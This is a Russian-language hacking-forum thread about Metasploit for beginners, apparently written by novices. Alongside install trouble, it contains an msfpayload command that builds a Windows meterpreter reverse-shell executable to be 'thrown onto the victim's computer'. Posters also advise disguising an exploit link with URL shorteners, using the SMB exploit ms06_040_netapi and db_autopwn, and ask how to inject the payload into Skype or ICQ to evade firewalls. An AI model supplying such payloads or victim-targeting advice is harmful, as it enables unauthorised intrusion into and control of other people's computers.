Авторские статьи Metasploit Framework для ламеров

Если за NAT то требуется проброс портов настроить в роутере и посмотреть внешний IP для реверсшелла.

 

скачал уже под ubuntu)) как установить не знаю)) через VirtualBox норм работать будет?

 

не подскажешь офф сайт?)

спасибо нашел)) http://dev.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu

 

http://dev.metasploit.com/redmine/projects/framework/wiki/Install_Ubuntu

 

установил я msf и не могу найти сами сплоиты в папках.. кто щас пользуется 3.6.0?? подскажите что делать??

вот что лежит в папке "armitage" "HACKING" "msfconsole" "msfgui" "msfpescan" "plugins" "tools" "data" "lib" "msfd" "msfmachscan" "msfrpc" "README" "documentation" "modules" "msfelfscan" "msfopcode" "msfrpcd" "scripts" "external" "msfcli" "msfencode" "msfpayload" "msfupdate" "test"

 

Code:

msfc> search эксплоит

выводит все удовлетворяющие критерию поиска эксплоиты.

 

я на самом деле и не знаю какой мне именно надо)) вот висит консоль и не знаю что писать там. Где взять сплоит, как прикрутить начинку и все в этом духе) перечитывал несколько раз первую страницу и не понял где брать начинку и эксплоит и что с ними делать)

 

начал пользоваться msfgui вреде все понятно стало)) все нашел) тока вот не пойму куда сохраняется сплоит после всех настроек...

 

Думаю, что мало кто будет переходить по ссылке http://10.0.0.1:8080/ . Как можно сделать нормальную ссылку, подскажите пожалуйста.

 

заюзай любой сервис коротких ссылок, кроме того есть параметр URIPAPH вроде.

 

Спасибо. А есть такие эксплойты, ссылки на которые не надо впаривать, а работают сразу?

 

Ога. В ночь с четверга на пятницу тебе нужно сделать татуировку с пентаграммой и айпишником того, кого нужно похекать у себя на заднице.

PS. Ищи сплоиты под SMB и другие сетевые службы

 

Окэй, босс.

Спасибо
То есть exploit ms06_040_netapi будет работать без впаривания ссылки? В metasploit'e идет как smb exploit.

 

Будет, если система уязвима.

 

а еще можно проверить командой db_autopwn

 

На своем компе под виндой метасплойт установился нормально, но нет выделенного IP. Как это можно обойти?

Взял голый VPS с debian, установил все зависимости по инструкции с оффсайта, но поставить msf 3.7.1 так и не смог (ни full, ни mini) вечно вылезают разные ошибки...

Может как то можно организовать бэкконект с промежуточным хостом (через этот vps)?

 

Попробуй сервис no-ip.com

 

Это все круто , но скоро IPV6 , так что о мета еще стоит и подумать . Такое ли большое будущее ...

 

Допустим ми сделали ехе

Code:

./msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.104.130 LPORT=4444 X > /tmp/7.exe

кинули на комп жертве, он запускает, и сли стоит фаервол, дальше него дело не пойдет.
Есть какойто реверс, что б инжектился в процес, например в скайп,или аську?

 

Ребят,помогите.Устанавил я Metasploit Framework 3.7.2.Вроде все установилось нормально, но при запуске msfconsole запускается консоль и я там нечего не могу писать!Консоль через некоторые время исчезает.Может я что то не установил?В чем проблема?
Заранее благодарен.